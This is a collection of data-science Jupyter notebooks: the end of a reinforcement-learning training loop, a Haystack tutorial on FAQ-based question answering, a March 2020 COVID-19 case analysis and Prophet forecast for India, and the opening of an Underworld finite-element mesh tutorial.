gamma=0.99, # 0.99 epsilon=initial_epsilon, # 1.0 epsilon_decay_rate=epsilon_decay_rate, # 0.9995 min_epsilon=0.00001) # 0.01 def run(agent, env, num_episodes=10000, mode='train', alpha_resets=None, epsilon_resets=None, print_every=100): """Run agent in given reinforcement learning environment and return scores.""" alpha_reset_at, alpha_reset_vals, alpha_new_decay_rates = zip(*alpha_resets) if alpha_resets else ([], [], []) epsilon_reset_at, epsilon_reset_vals, epsilon_new_decay_rates = zip(*epsilon_resets) if epsilon_resets else ([], [], []) scores = [] max_avg_score = avg_score = -np.inf best_score = max_avg_score best_agent = copy.deepcopy(agent) for i_episode in range(1, num_episodes+1): # Initialize episode state = env.reset() action = agent.reset_episode(state) total_reward = 0 done = False # Roll out steps until done while not done: state, reward, done, info = env.step(action) total_reward += reward action = agent.act(state, reward, done, mode) # Save final score scores.append(total_reward) # Print episode stats if mode == 'train': if total_reward > best_score: best_score = total_reward best_agent = copy.deepcopy(agent) if i_episode in alpha_reset_at: new_alpha = alpha_reset_vals[alpha_reset_at.index(i_episode)] agent.reset_learning(new_alpha) new_decay = alpha_new_decay_rates[alpha_reset_at.index(i_episode)] if new_decay: agent.alpha_decay_rate = new_decay if i_episode in epsilon_reset_at: new_epsilon = epsilon_reset_vals[epsilon_reset_at.index(i_episode)] agent.reset_exploration(new_epsilon) new_decay = epsilon_new_decay_rates[epsilon_reset_at.index(i_episode)] if new_decay: agent.epsilon_decay_rate = new_decay if len(scores) > 100: avg_score = np.mean(scores[-100:]) if avg_score > max_avg_score: max_avg_score = avg_score if i_episode % print_every == 0: print("\rEpisode {}/{} | Max Average Score: {} | Current Average Score: {} | Current Alpha: {} | Current Epsilon: {}"\ .format(i_episode, num_episodes, max_avg_score, avg_score, agent.alpha, agent.epsilon), end="") sys.stdout.flush() return scores, best_agent # agent.initial_alpha # agent.initial_epsilon alpha_resets = [(1, 0.02, 1.0)] epsilon_resets = [(1, 1.0, get_decay_rate(1.0, 0.00001, 30000))] scores, best_agent = run(agent, env, num_episodes=30000, alpha_resets=alpha_resets, epsilon_resets=epsilon_resets, print_every=10) def plot_scores(scores, rolling_window=100): """Plot scores and optional rolling mean using specified window.""" plt.figure(figsize=(12, 12)); plt.plot(scores); plt.title("Scores"); rolling_mean = pd.Series(scores).rolling(rolling_window).mean() plt.plot(rolling_mean); return rolling_mean rolling_mean = plot_scores(scores) frames_per_second = 30 second_per_frame = 1 / frames_per_second state = env.reset() score = 0 t0 = time.time() while True: action = agent.act(state, mode='test') env.render() state, reward, done, _ = env.step(action) score += reward temporal_time_diff = time.time() - t0 if temporal_time_diff < second_per_frame: time.sleep(second_per_frame - temporal_time_diff) t0 = time.time() if done: break print('Final score:', score) env.close() ``` ---
github_jupyter
# Utilizing existing FAQs for Question Answering [![Open In Colab](https://colab.research.google.com/assets/colab-badge.svg)](https://colab.research.google.com/github/deepset-ai/haystack/blob/master/tutorials/Tutorial4_FAQ_style_QA.ipynb) While *extractive Question Answering* works on pure texts and is therefore more generalizable, there's also a common alternative that utilizes existing FAQ data. **Pros**: - Very fast at inference time - Utilize existing FAQ data - Quite good control over answers **Cons**: - Generalizability: We can only answer questions that are similar to existing ones in FAQ In some use cases, a combination of extractive QA and FAQ-style can also be an interesting option. ### Prepare environment #### Colab: Enable the GPU runtime Make sure you enable the GPU runtime to experience decent speed in this tutorial. **Runtime -> Change Runtime type -> Hardware accelerator -> GPU** <img src="https://raw.githubusercontent.com/deepset-ai/haystack/master/docs/_src/img/colab_gpu_runtime.jpg"> ``` # Make sure you have a GPU running !nvidia-smi # Install the latest release of Haystack in your own environment #! pip install farm-haystack # Install the latest master of Haystack !pip install grpcio-tools==1.34.1 !pip install git+https://github.com/deepset-ai/haystack.git from haystack import Finder from haystack.document_store.elasticsearch import ElasticsearchDocumentStore from haystack.retriever.dense import EmbeddingRetriever from haystack.utils import print_answers import pandas as pd import requests ``` ### Start an Elasticsearch server You can start Elasticsearch on your local machine instance using Docker. If Docker is not readily available in your environment (eg., in Colab notebooks), then you can manually download and execute Elasticsearch from source. ``` # Recommended: Start Elasticsearch using Docker via the Haystack utility function from haystack.utils import launch_es launch_es() # In Colab / No Docker environments: Start Elasticsearch from source ! wget https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch-7.9.2-linux-x86_64.tar.gz -q ! tar -xzf elasticsearch-7.9.2-linux-x86_64.tar.gz ! chown -R daemon:daemon elasticsearch-7.9.2 import os from subprocess import Popen, PIPE, STDOUT es_server = Popen(['elasticsearch-7.9.2/bin/elasticsearch'], stdout=PIPE, stderr=STDOUT, preexec_fn=lambda: os.setuid(1) # as daemon ) # wait until ES has started ! sleep 30 ``` ### Init the DocumentStore In contrast to Tutorial 1 (extractive QA), we: * specify the name of our `text_field` in Elasticsearch that we want to return as an answer * specify the name of our `embedding_field` in Elasticsearch where we'll store the embedding of our question and that is used later for calculating our similarity to the incoming user question * set `excluded_meta_data=["question_emb"]` so that we don't return the huge embedding vectors in our search results ``` from haystack.document_store.elasticsearch import ElasticsearchDocumentStore document_store = ElasticsearchDocumentStore(host="localhost", username="", password="", index="document", embedding_field="question_emb", embedding_dim=768, excluded_meta_data=["question_emb"]) ``` ### Create a Retriever using embeddings Instead of retrieving via Elasticsearch's plain BM25, we want to use vector similarity of the questions (user question vs. FAQ ones). We can use the `EmbeddingRetriever` for this purpose and specify a model that we use for the embeddings. ``` retriever = EmbeddingRetriever(document_store=document_store, embedding_model="deepset/sentence_bert", use_gpu=True) ``` ### Prepare & Index FAQ data We create a pandas dataframe containing some FAQ data (i.e curated pairs of question + answer) and index those in elasticsearch. Here: We download some question-answer pairs related to COVID-19 ``` # Download temp = requests.get("https://raw.githubusercontent.com/deepset-ai/COVID-QA/master/data/faqs/faq_covidbert.csv") open('small_faq_covid.csv', 'wb').write(temp.content) # Get dataframe with columns "question", "answer" and some custom metadata df = pd.read_csv("small_faq_covid.csv") # Minimal cleaning df.fillna(value="", inplace=True) df["question"] = df["question"].apply(lambda x: x.strip()) print(df.head()) # Get embeddings for our questions from the FAQs questions = list(df["question"].values) df["question_emb"] = retriever.embed_queries(texts=questions) df = df.rename(columns={"question": "text"}) # Convert Dataframe to list of dicts and index them in our DocumentStore docs_to_index = df.to_dict(orient="records") document_store.write_documents(docs_to_index) ``` ### Ask questions Initialize a Pipeline (this time without a reader) and ask questions ``` from haystack.pipeline import FAQPipeline pipe = FAQPipeline(retriever=retriever) prediction = pipe.run(query="How is the virus spreading?", top_k_retriever=10) print_answers(prediction, details="all") ``` ## About us This [Haystack](https://github.com/deepset-ai/haystack/) notebook was made with love by [deepset](https://deepset.ai/) in Berlin, Germany We bring NLP to the industry via open source! Our focus: Industry specific language models & large scale QA systems. Some of our other work: - [German BERT](https://deepset.ai/german-bert) - [GermanQuAD and GermanDPR](https://deepset.ai/germanquad) - [FARM](https://github.com/deepset-ai/FARM) Get in touch: [Twitter](https://twitter.com/deepset_ai) | [LinkedIn](https://www.linkedin.com/company/deepset-ai/) | [Slack](https://haystack.deepset.ai/community/join) | [GitHub Discussions](https://github.com/deepset-ai/haystack/discussions) | [Website](https://deepset.ai) By the way: [we're hiring!](https://apply.workable.com/deepset/)
github_jupyter
#COVID-19 - Pandemic in India! ##About COVID-19 The **coronavirus (COVID-19)** pandemic has spread across 190 countries infecting 4.2 lakh people and killing 16,500 so far. In India, as many as 562 COVID-19 cases have been reported so far. Of these, 37 have recovered and 10 have died. On March 24, Prime Minister Narendra Modi annouced that the country would go under 21-day lackdown to combat the spread of the virus. Infections are rapidly rising in Italy, France, Germany, Spain, United Kingdom and the United States. It has has a massive impact on the global economy and stock markets The outbreak of COVID-19 is developing into a major international crisis, and it's starting to influence important aspects of daily life. For example in India: - **Travel:** Complete lockdown no domestic or international flights are allowed in India for till next 21 days as decided by Ministry of Civil Aviation. - **Grocery stores:** In highly affected areas, people are starting to stock up on essential goods leading to shortage of essential stuff. **Corona Virus Explained in Simple Terms:** - Let's say Rishav got infected yesterday, but he won't know it untill next 14 days - Rishav thinks he is healthy but he is infecting 10 persons per day - Now these 10 persons think they are completely healthy, they travel, go out and infect 100 others - These 100 persons think they are healthy but they have already infected 1000 persons - No one knows who is healthy or who can infect you - All you can do is be responsible, stay in quarentine ##Problem Statement: Its **25th March Afternoon** and India has reported its **9th** death with **562 total confirmed cases** due to COVID-19. Fresh cases from Manipur, Bihar, Gujrat, and Madhya Pradhesh have been reported by the Union Ministry of Health and Family Welfare. As the coronavirus outbreak continues to spread in the country, the question that we as Indians are trying to answer is : **"Will India be able to tackle this pandemic or are we going to witness another Italy/ S.Korea/ Wuhan?"** ### Goal: We need a strong model that predicts how the virus could spread across different countries and regions. The goal of this task is to build a model that predicts the spread of the virus in the next 7 days. ###Tasks to be performed: - Analysing the present condition in India - Is this trend similar to Italy/S. Korea/ Wuhan - Exploring the world wide data - Forecasting the world wide COVID-19 cases using Prophet ###Importing the required libraries ``` # importing the required libraries import pandas as pd # Visualisation libraries import matplotlib.pyplot as plt %matplotlib inline import seaborn as sns import plotly.express as px import plotly.graph_objects as go import folium from folium import plugins # Manipulating the default plot size plt.rcParams['figure.figsize'] = 10, 12 # Disable warnings import warnings warnings.filterwarnings('ignore') ``` # Part 1: Analysing the present condition in India **How it started in India?:** The first **COVID-19** case was reported on 30th January 2020 when a student arrived **Kerala** from Wuhan. Just in next 2 days, Kerela reported 2 more cases. For almost a month, no new cases were reported in India, however, on 2nd March 2020, five new cases of corona virus were reported in Kerala again and since then the cases have been rising affecting **25** states, till now *(Bihar and Manipur being the most recent)*. ##Recent COVID-19 cases in India: PM Modi Speech - 24th March - **PM Narendra Modi** declared a three-week nationwide lockdown starting midnight Tuesday, explaining that it was the only way of breaking the Covid-19 infection cycle. - Modi told people to **stay inside** their homes for **21 days**, warning that if they didn’t do so the country would be set back 21 years and families would be destroyed. - Modi later issued an appeal to the public to **stop panic buying** as people began crowding markets to stock up before the midnight deadline. - The government also issued a notification that said **all essential services will remain open**, as before, and **all essential commodities and medicines would be available**. Banks, ATMs, petrol pumps, hospitals and grocery shops will continue to function. - **All transport services** — air, rail and roadways — will **remain suspended** until April 14. ## 1.1 Reading the Datasets ``` #Read a .xls file by creating a dataframe using pandas # Reading the datasets df= pd.read_excel('/Covid cases in India (1).xlsx') df_india = df.copy() df # Coordinates of India States and Union Territories India_coord = pd.read_excel('/Indcor (3).xlsx') #Day by day data of India, Korea, Italy and Wuhan dbd_India = pd.read_excel('/per_day_cases.xlsx',parse_dates=True, sheet_name='India') dbd_Italy = pd.read_excel('/per_day_cases.xlsx',parse_dates=True, sheet_name="Italy") dbd_Korea = pd.read_excel('/per_day_cases.xlsx',parse_dates=True, sheet_name="Korea") dbd_Wuhan = pd.read_excel('/per_day_cases.xlsx',parse_dates=True, sheet_name="Wuhan") ``` ## 1.2 Analysing COVID19 Cases in India ``` #Playing around with the dataframe and create a new attribute of 'Total Case' #Total case is the total number of confirmed cases (Indian National + Foreign National) df.drop(['S. No.'],axis=1,inplace=True) df['Total cases'] = df['Total Confirmed cases (Indian National)'] + df['Total Confirmed cases ( Foreign National )'] total_cases = df['Total cases'].sum() print('Total number of confirmed COVID 2019 cases across India till date (22nd March, 2020):', total_cases) #Highlight the dataframe df.style.background_gradient(cmap='Blues') #Darker the Blue Greater is the fatality ``` **Visualization Inference:** * Manipur and Mizoram reports thier first case. * Kerela has crossed Maharashtra in terms of highest number of confirmed cases. * Haryana and Telengana has the highest count of confirmed Foreign National count. * Till 25th of March 9 people have died in India * Kerala, Maharashtra, and karnataka are currently TOP 3 states with maximum number of confirmed cases ## 1.3 Number of Active COVID-19 cases in affected State/Union Territories ``` #Total Active -> No. of people Hospitalised #Total Active is the Total cases - (Number of death + Cured) df['Total Active'] = df['Total cases'] - (df['Death'] + df['Cured']) total_active = df['Total Active'].sum() print('Total number of active COVID 2019 cases across India:', total_active) Tot_Cases = df.groupby('Name of State/UT')['Total Active'].sum().sort_values(ascending=False).to_frame() Tot_Cases.style.background_gradient(cmap='Reds') ``` ## 1.4 Visualising the spread geographically ``` #Using folium to create a zoomable map df_full = pd.merge(India_coord,df,on='Name of State/UT') map = folium.Map(location=[20, 70], zoom_start=4,tiles='Stamenterrain') for lat, lon, value, name in zip(df_full['lat'], df_full['lng'], df_full['Total cases'], df_full['Name of State/UT']): folium.CircleMarker([lat, lon], radius=value*0.8, popup = ('<strong>State</strong>: ' + str(name).capitalize() + '<br>''<strong>Total Cases</strong>: ' + str(value) + '<br>'),color='pink',fill_color='red',fill_opacity=0.3 ).add_to(map) map ``` ## 1.5 Confirmed vs Recovered figures ``` #using Seaborn for visualization f, ax = plt.subplots(figsize=(12, 8)) data = df_full[['Name of State/UT','Total cases','Cured','Death']] data.sort_values('Total cases',ascending=False,inplace=True) sns.set_color_codes("pastel") sns.barplot(x="Total cases", y="Name of State/UT", data=data,label="Total", color="b") sns.set_color_codes("muted") sns.barplot(x="Cured", y="Name of State/UT", data=data, label="Cured", color="g") # Add a legend and informative axis label ax.legend(ncol=2, loc="lower right", frameon=True) ax.set(xlim=(0, 35), ylabel="",xlabel="Cases") sns.despine(left=True, bottom=True) #Total cases are in blue and cured cases are green ``` ## 1.6 How the Coronavirus cases are rising? ``` #This cell's code is required when you are working with plotly on colab import plotly plotly.io.renderers.default = 'colab' #create interactive graphs using plotly # import plotly.graph_objects as go # Rise of COVID-19 cases in India fig = go.Figure() fig.add_trace(go.Scatter(x=dbd_India['Date'], y = dbd_India['Total Cases'], mode='lines+markers',name='Total Cases')) fig.update_layout(title_text='Trend of Coronavirus Cases in India (Cumulative cases)',plot_bgcolor='rgb(255, 215, 139)') fig.show() # New COVID-19 cases reported daily in India import plotly.express as px fig = px.bar(dbd_India, x="Date", y="New Cases", barmode='group', height=400) fig.update_layout(title_text='Coronavirus Cases in India on daily basis',plot_bgcolor='rgb(128, 230, 230)') fig.show() ``` # Part 2: Is the trend similar to Italy/ S.Korea/ Wuhan? India has already crossed 562 cases. It is very important to contain the situation in the coming 21 days.The numbers of coronavirus patients starting doubling after these countries hit the 100 mark and almost starting increasing exponentially. ## 2.1 Cumulative cases in India, Italy, S.Korea, and Wuhan ``` # import plotly.express as px fig = px.bar(dbd_India, x="Date", y="Total Cases", color='Total Cases', orientation='v', height=600, title='Confirmed Cases in India', color_discrete_sequence = px.colors.cyclical.IceFire) fig.update_layout(plot_bgcolor='rgb(255, 215, 230)') fig.show() fig = px.bar(dbd_Italy, x="Date", y="Total Cases", color='Total Cases', orientation='v', height=600, title='Confirmed Cases in Italy', color_discrete_sequence = px.colors.cyclical.IceFire) fig.update_layout(plot_bgcolor='rgb(255, 215, 230)') fig.show() fig = px.bar(dbd_Korea, x="Date", y="Total Cases", color='Total Cases', orientation='v', height=600, title='Confirmed Cases in South Korea', color_discrete_sequence = px.colors.cyclical.IceFire) fig.update_layout(plot_bgcolor='rgb(255, 215, 230)') fig.show() fig = px.bar(dbd_Wuhan, x="Date", y="Total Cases", color='Total Cases', orientation='v', height=600, title='Confirmed Cases in Wuhan', color_discrete_sequence = px.colors.cyclical.IceFire) fig.update_layout(plot_bgcolor='rgb(255, 215, 230)') fig.show() ``` ###Visualization Inference - Confirmed cases in India is rising exponentially with no fixed pattern (Very less test in India) - Confirmed cases in Italy is rising exponentially with certain fixed pattern - Confirmed cases in S.Korea is rising gradually - There has been only 3 confirmed cases in Wuhan since last week. They have almost controlled the COVID-19 ###Recent Updates from Wuhan - China on Tuesday decided to lift the three-month lockdown on more than 56 million people in the central Hubei province. - Bus services began in Wuhan for the first time since January 23 as a bus departed from its terminus at Hankou railway station at 5:25 am on Wednesday - The prolonged lockdown of Hubei's capital Wuhan will end on April 8, lifting the mass quarantine over the city with a population of over 11 million. ## 2.2 Comparison between the rise of cases in Wuhan, S.Korea, Italy and India ``` #Create subplots using plotly # import plotly.graph_objects as go from plotly.subplots import make_subplots fig = make_subplots( rows=2, cols=2, specs=[[{}, {}], [{"colspan": 2}, None]], subplot_titles=("S.Korea", "Italy", "India", "Wuhan")) fig.add_trace(go.Bar(x=dbd_Korea['Date'], y=dbd_Korea['Total Cases'], marker=dict(color=dbd_Korea['Total Cases'], coloraxis="coloraxis")),1, 1) fig.add_trace(go.Bar(x=dbd_Italy['Date'], y=dbd_Italy['Total Cases'], marker=dict(color=dbd_Italy['Total Cases'], coloraxis="coloraxis")),1, 2) fig.add_trace(go.Bar(x=dbd_India['Date'], y=dbd_India['Total Cases'], marker=dict(color=dbd_India['Total Cases'], coloraxis="coloraxis")),2, 1) #fig.add_trace(go.Bar(x=dbd_Wuhan['Date'], y=dbd_Wuhan['Total Cases'], #marker=dict(color=dbd_Wuhan['Total Cases'], coloraxis="coloraxis")),2, 2) fig.update_layout(coloraxis=dict(colorscale='Bluered_r'), showlegend=False,title_text="Total Confirmed cases(Cumulative)") fig.update_layout(plot_bgcolor='rgb(255, 215, 230)') fig.show() ``` ## 2.3 Trend after crossing 100 cases ``` # import plotly.graph_objects as go title = 'Main Source for News' labels = ['S.Korea', 'Italy', 'India'] colors = ['rgb(0, 0, 0)', 'rgb(255,0,0)', 'rgb(49,130,189)'] mode_size = [10, 10, 12] line_size = [1, 1, 8] fig = go.Figure() fig.add_trace(go.Scatter(x=dbd_Korea['Days after surpassing 100 cases'], y=dbd_Korea['Total Cases'],mode='lines', name=labels[0], line=dict(color=colors[0], width=line_size[0]), connectgaps=True)) fig.add_trace(go.Scatter(x=dbd_Italy['Days after surpassing 100 cases'], y=dbd_Italy['Total Cases'],mode='lines', name=labels[1], line=dict(color=colors[1], width=line_size[1]), connectgaps=True)) fig.add_trace(go.Scatter(x=dbd_India['Days after surpassing 100 cases'], y=dbd_India['Total Cases'],mode='lines', name=labels[2], line=dict(color=colors[2], width=line_size[2]), connectgaps=True)) annotations = [] annotations.append(dict(xref='paper', yref='paper', x=0.5, y=-0.1, xanchor='center', yanchor='top', text='Days after crossing 100 cases ', font=dict(family='Arial', size=12, color='rgb(150,150,150)'), showarrow=False)) fig.update_layout(annotations=annotations,plot_bgcolor='skyblue',yaxis_title='Cumulative cases') fig.show() ``` **Visualization Inference:** * Above graph depicts the number of days after the COVID-19 cases crosses 100 vs total number of cases in each country. * Both Italy and S.Korea have crossed the mark of 5600 in the next 13 days. * Number of cases detected(trend) in India is less as compared to Italy and S.Korea ##2.4 Why is India testing so little? [CNN Report](hhttps://www.bbc.com/news/amp/world-asia-india-51922204) ###**Why is a densely populated country with more than a billion people testing so little?** The official assumption is the disease has still not spread in the community. As early "evidence" health authorities say 826 samples collected from patients suffering from acute respiratory disease from 50 government hospitals across India between 1 and 15 March tested negative for coronavirus. Also, hospitals have not yet reported a spike in admissions of respiratory distress cases. "It is reassuring that at the moment there is no evidence of community outbreak," says Balram Bhargava, director of the Indian Council of Medical Research (ICMR). He believes Mr Ghebreyesus's advice is "premature" for India, and it would only "create more fear, more paranoia and more hype". **But experts are not so sure.** Many of them believe India is also testing below scale because it fears that its under-resourced and uneven public health system could be swamped by patients. India could be buying time to stock up on testing kits and add isolation and hospital beds. "I know mass testing is not a solution, but our testing appears to be too limited. We need to quickly expand to restrict community transmission," K Sujatha Rao, former federal health secretary and author of But Do We Care: India's Health System. **India** has eight doctors per 10,000 people compared to 41 in **Italy** and 71 in **Korea**. It has one state-run hospital for more than 55,000 people. (Private hospitals are out of reach for most people). India has a poor culture of testing, and most people with flu symptoms do not go to doctors and instead try home remedies or go to pharmacies. There's a scarcity of isolation beds, trained nursing staff and medics, and ventilators and intensive care beds. ###India poor testing rate masked coronavirus cases: [Report](https://www.aljazeera.com/news/2020/03/india-poor-testing-rate-masked-coronavirus-cases-200318040314568.html) #Part 3: Exploring World wide data ``` df = pd.read_csv('/covid_19_clean_complete.csv',parse_dates=['Date']) df.rename(columns={'ObservationDate':'Date', 'Country/Region':'Country'}, inplace=True) df_confirmed = pd.read_csv("/time_series_covid19_confirmed_global.csv") df_recovered = pd.read_csv("/time_series_covid19_recovered_global.csv") df_deaths = pd.read_csv("/time_series_covid19_deaths_global.csv") df_confirmed.rename(columns={'Country/Region':'Country'}, inplace=True) df_recovered.rename(columns={'Country/Region':'Country'}, inplace=True) df_deaths.rename(columns={'Country/Region':'Country'}, inplace=True) df_deaths.head() df.head() df2 = df.groupby(["Date", "Country", "Province/State"])[['Date', 'Province/State', 'Country', 'Confirmed', 'Deaths', 'Recovered']].sum().reset_index() df2.head() # Check for India's data df.query('Country=="India"').groupby("Date")[['Confirmed', 'Deaths', 'Recovered']].sum().reset_index() #Overall worldwide Confirmed/ Deaths/ Recovered cases df.groupby('Date').sum().head() ``` ## 3.1 Visualizing: Worldwide NCOVID-19 cases ``` confirmed = df.groupby('Date').sum()['Confirmed'].reset_index() deaths = df.groupby('Date').sum()['Deaths'].reset_index() recovered = df.groupby('Date').sum()['Recovered'].reset_index() fig = go.Figure() #Plotting datewise confirmed cases fig.add_trace(go.Scatter(x=confirmed['Date'], y=confirmed['Confirmed'], mode='lines+markers', name='Confirmed',line=dict(color='Blue', width=2))) fig.add_trace(go.Scatter(x=deaths['Date'], y=deaths['Deaths'], mode='lines+markers', name='Deaths', line=dict(color='Red', width=2))) fig.add_trace(go.Scatter(x=recovered['Date'], y=recovered['Recovered'], mode='lines+markers', name='Recovered', line=dict(color='Green', width=2))) fig.update_layout(title='Worldwide NCOVID-19 Cases', xaxis_tickfont_size=14,yaxis=dict(title='Number of Cases')) fig.show() ``` #Part 4: Forecasting Total Number of Cases Worldwide ## Prophet Prophet is open source software released by Facebook’s Core Data Science team. It is available for download on CRAN and PyPI. We use Prophet, a procedure for forecasting time series data based on an additive model where non-linear trends are fit with yearly, weekly, and daily seasonality, plus holiday effects. It works best with time series that have strong seasonal effects and several seasons of historical data. Prophet is robust to missing data and shifts in the trend, and typically handles outliers well. ## Why Prophet? * **Accurate and fast:** Prophet is used in many applications across Facebook for producing reliable forecasts for planning and goal setting. Facebook finds it to perform better than any other approach in the majority of cases. It fit models in [Stan](https://mc-stan.org/) so that you get forecasts in just a few seconds. * **Fully automatic:** Get a reasonable forecast on messy data with no manual effort. Prophet is robust to outliers, missing data, and dramatic changes in your time series. * **Tunable forecasts:** The Prophet procedure includes many possibilities for users to tweak and adjust forecasts. You can use human-interpretable parameters to improve your forecast by adding your domain knowledge * **Available in R or Python:** Facebook has implemented the Prophet procedure in R and Python. Both of them share the same underlying Stan code for fitting. You can use whatever language you’re comfortable with to get forecasts. ## References - https://facebook.github.io/prophet/ - https://facebook.github.io/prophet/docs/ - https://github.com/facebook/prophet - https://facebook.github.io/prophet/docs/quick_start.html ``` from fbprophet import Prophet confirmed = df.groupby('Date').sum()['Confirmed'].reset_index() deaths = df.groupby('Date').sum()['Deaths'].reset_index() recovered = df.groupby('Date').sum()['Recovered'].reset_index() ``` The input to Prophet is always a dataframe with two columns: **ds** and **y**. The **ds (datestamp)** column should be of a format expected by Pandas, ideally YYYY-MM-DD for a date or YYYY-MM-DD HH:MM:SS for a timestamp. The y column must be numeric, and represents the measurement we wish to forecast. ``` confirmed.columns = ['ds','y'] #confirmed['ds'] = confirmed['ds'].dt.date confirmed['ds'] = pd.to_datetime(confirmed['ds']) confirmed.tail() ``` ##4.1 Forecasting Confirmed NCOVID-19 Cases Worldwide with Prophet (Base model) Generating a week ahead forecast of confirmed cases of NCOVID-19 using Prophet, with 95% prediction interval by creating a base model with no tweaking of seasonality-related parameters and additional regressors. ``` m = Prophet(interval_width=0.95) m.fit(confirmed) future = m.make_future_dataframe(periods=7) future.tail() ``` The **predict** method will assign each row in future a predicted value which it names **yhat**. If you pass in historical dates, it will provide an in-sample fit. The **forecast object** here is a new dataframe that includes a column yhat with the forecast, as well as columns for components and uncertainty intervals. ``` #predicting the future with date, and upper and lower limit of y value forecast = m.predict(future) forecast[['ds', 'yhat', 'yhat_lower', 'yhat_upper']].tail() ``` You can plot the forecast by calling the Prophet.plot method and passing in your forecast dataframe. ``` confirmed_forecast_plot = m.plot(forecast) confirmed_forecast_plot =m.plot_components(forecast) ``` ## What do you think was the reason behind calling Janta Curfew on 22nd March and country lockdown from 24th March till next 21 days? - **PM Modi** announced Janta Curfew in India on 22nd March. From 24th March there is a complete lockdown the entire country. Definately its for our own good. ![alt text](https://i.imgur.com/bP2Rf9b.png) - No scheduled international commercial flight's paasenger shall be allowed to land in india from March 22 for a week. - From 24th midnight all the domestic and international flights have been called off. ![alt text](https://i.imgur.com/P9z3TVL.png) ##4.2 Forecasting Worldwide Deaths using Prophet (Base model) Generating a week ahead forecast of confirmed cases of NCOVID-19 using Prophet, with 95% prediction interval by creating a base model with no tweaking of seasonality-related parameters and additional regressors. ``` deaths.columns = ['ds','y'] deaths['ds'] = pd.to_datetime(deaths['ds']) m = Prophet(interval_width=0.95) m.fit(deaths) future = m.make_future_dataframe(periods=7) future.tail() forecast = m.predict(future) forecast[['ds', 'yhat', 'yhat_lower', 'yhat_upper']].tail() deaths_forecast_plot = m.plot(forecast) deaths_forecast_plot = m.plot_components(forecast) ``` ##4.3 Forecasting Worldwide Recovered Cases with Prophet (Base model) Generating a week ahead forecast of confirmed cases of NCOVID-19 using Prophet, with 95% prediction interval by creating a base model with no tweaking of seasonality-related parameters and additional regressors. ``` recovered.columns = ['ds','y'] recovered['ds'] = pd.to_datetime(recovered['ds']) m = Prophet(interval_width=0.95) m.fit(recovered) future = m.make_future_dataframe(periods=7) future.tail() forecast = m.predict(future) forecast[['ds', 'yhat', 'yhat_lower', 'yhat_upper']].tail() recovered_forecast_plot = m.plot(forecast) recovered_forecast_plot = m.plot_components(forecast) ``` ##4.4 Inference from the above Analysis and Forecast ###Will Indian become the next Italy/ S.Korea/ Wuhan? Yes, if you look at the world's data and its forecast you can say that India might face one of its worst days if we are not taking strict measures against COVID-19. ###**A Humble Request to all Indians, please TEST, TEST, TEST: COVID-19** Don't take your cough and cold lighly as before. If you look at the data number of cases in India is rising but not like in Italy, Wuhan, S.Korea, Spain, or USA. Don't get fool by these numbers (COVID cases in India). I think the number is less because of low awareness and less tests being conducted in India. Currently India is a deadly and risky zone as there are very few COVID-19 test centres in India. Imagine how many infected people are still around you and are infecting others unknowingly. Remember **India ranks 145** in terms of global healthcare rank while [Italy is on 2nd](https://worldpopulationreview.com/countries/best-healthcare-in-the-world/). - Indian government's decision for today confirms that the above prediction is definitely something we pay attention to. - Please stay home/indoors for all 21 days. This will definitely help us tackle the situation. It won't stop the pandemic, but it would definitely help us reduce the exponential rate at which it is increasing. - Let's give a hand in fighting this pandemic atleast by quarantining ourselves by staying indoors and protecting you and your family. - Go and get a checkup done in case you are suffering from cough,cold, fever, shortness of breath and breathing difficulties. Can't tell for sure but(due to lack of data) , but it might be possible that we don't have the exact number of the COVID-19 cases in India becasuse sometimes it takes weeks to see the first sign/symptom for it. - If you're not getting the checkup done, you might add in spreading the virus unintentionally - Its time we take this pandemic seriously - **LIVE & HELP OTHERS LIVE** - Take precautions, stay indoors, and utilize this time to develop your machine learning skills. ### Indian streets today! ![alt text](https://i.imgur.com/jIE1kro.jpg) - Nature is sending us a message with the coronavirus pandemic and the ongoing climate crisis, according to the UN’s environment chief, Inger Andersen. - Think on a positive side, this lockdown will help the environment to heal better, reduce different kinds of pollution, and improve air quality #**Data Source:** - https://www.mohfw.gov.in/ - https://www.kaggle.com/sudalairajkumar/novel-corona-virus-2019-dataset
github_jupyter
# The Finite Element Mesh The finite element mesh is a fundamental construct for Underworld models. This notebook will go through different examples of what can be done with Underworld's mesh object. #### Overview: 1. Creating, visualising and accessing a mesh object. 2. Modifing a mesh. 3. Loading and saving meshes. **Keywords:** meshes, mesh geometry, loading data **References** 1. Moresi, L., Dufour, F., Muhlhaus, H.B., 2002. Mantle convection modeling with viscoelastic/brittle lithosphere: Numerical methodology and plate tectonic modeling. Pure Appl. Geophys. 159 (10), 2335–2356. 2. Moresi, L., Dufour, F., Muhlhaus, H.B., 2003. A Lagrangian integration point finite element method for large deformation modeling of viscoelastic geomaterials. J. Comput. Phys. 184, 476–497. 3. Moresi, L., Quenette, S., Lemiale, V., Meriaux, C., Appelbe, B., Muhlhaus, H.-B., 2007. Computational approaches to studying non-linear dynamics of the crust and mantle. Physics of the Earth and Planetary Interiors 163, 69–82. ``` import underworld as uw import glucifer ``` ## Creating, visualising and accessing a mesh object ``` # create an 8x8 rectalinear element mesh # range x:[0.0,2.0], y:[0.0,1.0] mesh = uw.mesh.FeMesh_Cartesian( elementType = ("Q1"), elementRes = (8, 8), minCoord = (0.0, 0.0), maxCoord = (2.0, 1.0) ) # visualising the result figMesh = glucifer.Figure(figsize=(1200,600)) figMesh.append( glucifer.objects.Mesh(mesh, nodeNumbers=True) ) figMesh.show() # The meshes' node geometry data can be directly read via numpy arrays `mesh.data` node_id = 1 print "Coordinate of mesh point {} is {}". format(node_id, mesh.data[node_id]) # Sets of node indexes that define boundaries are contained under the `mesh.specialSets` dictionary print mesh.specialSets.keys() # The left vertical wall is defined 'MinI_VertexSet' print mesh.specialSets['MinI_VertexSet'] # The right vertical wall is defined 'MaxI_VertexSet # The upper horizontal wall is defined 'MaxJ_VertexSet # The lower horizontal wall is defined 'MinJ_VertexSet ``` #### Element types The `elementType` input argument for a mesh defines the element shape functions. Shape functions define the polynomial order of finite element mesh. Underworld currently supports these element types: * Q2: quadratic elements * Q1: linear elements * dP1c: discontinuous linear elements. * dQ0: discontinuous constant elements. (i.e. 1 node in the centre of the element) #### Mixed elements The mesh object allow for up to 2 element types to be defined for a single mesh. This is initialised by passing a string to the `elementType` argument of the following form: * Q2/dpc1 * Q2/Q1 * Q1/dQ0 For a definition of finite element naming conventions used in Underworld see [here](https://femtable.org/femtable.pdf) Let us now create a 2D mesh object with mixed elements (for 3D simply add an extra term in the tuples for the ``elementRes``, ``minCoord`` and 